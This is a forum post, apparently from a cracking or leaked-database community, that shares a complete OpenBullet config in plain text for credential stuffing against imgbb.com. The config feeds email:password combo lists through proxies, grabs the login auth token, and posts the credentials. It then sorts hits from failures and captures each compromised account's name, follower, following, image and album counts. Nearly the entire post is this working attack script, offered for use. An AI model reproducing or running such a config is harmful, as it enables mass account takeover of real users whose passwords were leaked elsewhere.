• Join our Telegram Channel to receive notifications when new databases are released!

Open Bullet imgbb.com With Capture [.svb]

Anduril

Newbie
72
2
Not sure who the admin is here but if im not allowed to have a plain text version of config please don't ban me just let me know and i wont do the plan text i just figured this way there will always be the config even if file host site goes down!

Combo: Email:Pass
Proxy: YES
Capture: Yes

Capture: Name | Followers | Following | Images | Album Count

Plain Text

[SETTINGS]
{
"Name": "imgbb",
"SuggestedBots": 1,
"MaxCPM": 0,
"LastModified": "2023-08-08T02:11:28.0148198-05:00",
"AdditionalInfo": "",
"RequiredPlugins": [],
"Author": "@TyphonServices",
"Version": "1.1.2 [SB]",
"SaveEmptyCaptures": false,
"ContinueOnCustom": false,
"SaveHitsToTextFile": false,
"IgnoreResponseErrors": false,
"MaxRedirects": 8,
"NeedsProxies": false,
"OnlySocks": false,
"OnlySsl": false,
"MaxProxyUses": 0,
"BanProxyAfterGoodStatus": false,
"BanLoopEvasionOverride": -1,
"EncodeData": false,
"AllowedWordlist1": "Default",
"AllowedWordlist2": "",
"DataRules": [],
"CustomInputs": [],
"CaptchaUrl": "",
"IsBase64": false,
"FilterList": [],
"EvaluateMathOCR": false,
"SecurityProtocol": 0,
"ForceHeadless": false,
"AlwaysOpen": false,
"AlwaysQuit": false,
"QuitOnBanRetry": false,
"AcceptInsecureCertificates": true,
"DisableNotifications": false,
"DisableImageLoading": false,
"DefaultProfileDirectory": false,
"CustomUserAgent": "",
"RandomUA": false,
"CustomCMDArgs": "",
"Title": "imgbb",
"IconPath": "Icon\\svbfile.ico",
"LicenseSource": null,
"Message": null,
"MessageColor": "#FFFFFFFF",
"HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
"AuthorColor": "#FFFFB266",
"WordlistColor": "#FFB5C2E1",
"BotsColor": "#FFA8FFFF",
"CustomInputColor": "#FFD6C7C7",
"CPMColor": "#FFFFFFFF",
"ProgressColor": "#FFAD93E3",
"HitsColor": "#FF66FF66",
"CustomColor": "#FFFFB266",
"ToCheckColor": "#FF7FFFD4",
"FailsColor": "#FFFF3333",
"RetriesColor": "#FFFFFF99",
"OcrRateColor": "#FF4698FD",
"ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
#GET REQUEST GET "https://imgbb.com/login"

HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
HEADER "Pragma: no-cache"
HEADER "Accept: */*"

#TK PARSE "<SOURCE>" LR "<input type=\"hidden\" name=\"auth_token\" value=\"" "\">" -> VAR "1"

#POST REQUEST POST "https://imgbb.com/login"
CONTENT "auth_token=<1>&login-subject=<USER>&password=<PASS>"
CONTENTTYPE "application/x-www-form-urlencoded"
HEADER "Host: imgbb.com"
HEADER "Connection: keep-alive"
HEADER "Cache-Control: max-age=0"
HEADER "sec-ch-ua: \"Not/A)Brand\";v=\"99\", \"Google Chrome\";v=\"115\", \"Chromium\";v=\"115\""
HEADER "sec-ch-ua-mobile: ?0"
HEADER "sec-ch-ua-platform: \"Windows\""
HEADER "Upgrade-Insecure-Requests: 1"
HEADER "Origin: https://imgbb.com"
HEADER "Content-Type: application/x-www-form-urlencoded"
HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36"
HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7"
HEADER "Sec-Fetch-Site: same-origin"
HEADER "Sec-Fetch-Mode: navigate"
HEADER "Sec-Fetch-User: ?1"
HEADER "Sec-Fetch-Dest: document"
HEADER "Referer: https://imgbb.com/login"
HEADER "Accept-Language: en-US,en;q=0.9"
HEADER "Accept-Encoding: gzip, deflate"
HEADER "Content-Length: 93"

KEYCHECK
KEYCHAIN Success OR
KEY "Settings"
KEY "Sign out"
KEY "My Profile"
KEYCHAIN Failure OR
KEY "Wrong Username/Email password combination"
KEYCHAIN Custom "activation link needed" OR
KEY "Your account is almost ready"

#Name PARSE "<SOURCE>" LR "class=\"search two-icon-padding\" type=\"text\" placeholder=\"" "\" autocomplete=\"off\" spellcheck=\"false\" name=\"q\" " CreateEmpty=FALSE -> CAP "Name:"

#Followers PARSE "<SOURCE>" LR "<b data-text=\"followers-count\">" "</b> <span data-text=\"followers-label\" data-label-" CreateEmpty=FALSE -> CAP "Followers:"

#Following PARSE "<SOURCE>" LR "\"following-count\">" "</b> <span>Following</span></a>" CreateEmpty=FALSE -> CAP "Following:"

#Images PARSE "<SOURCE>" LR "\"><b data-text=\"image-count\">" "</b> <span data-text=\"image-label\" data-label-" CreateEmpty=FALSE -> CAP "Images:"

#Album_Count PARSE "<SOURCE>" LR "\"><b data-text=\"album-count\">" "</b> <span data-text=\"album-label\" data-" CreateEmpty=FALSE -> CAP "Album Count:"




Backup Download Links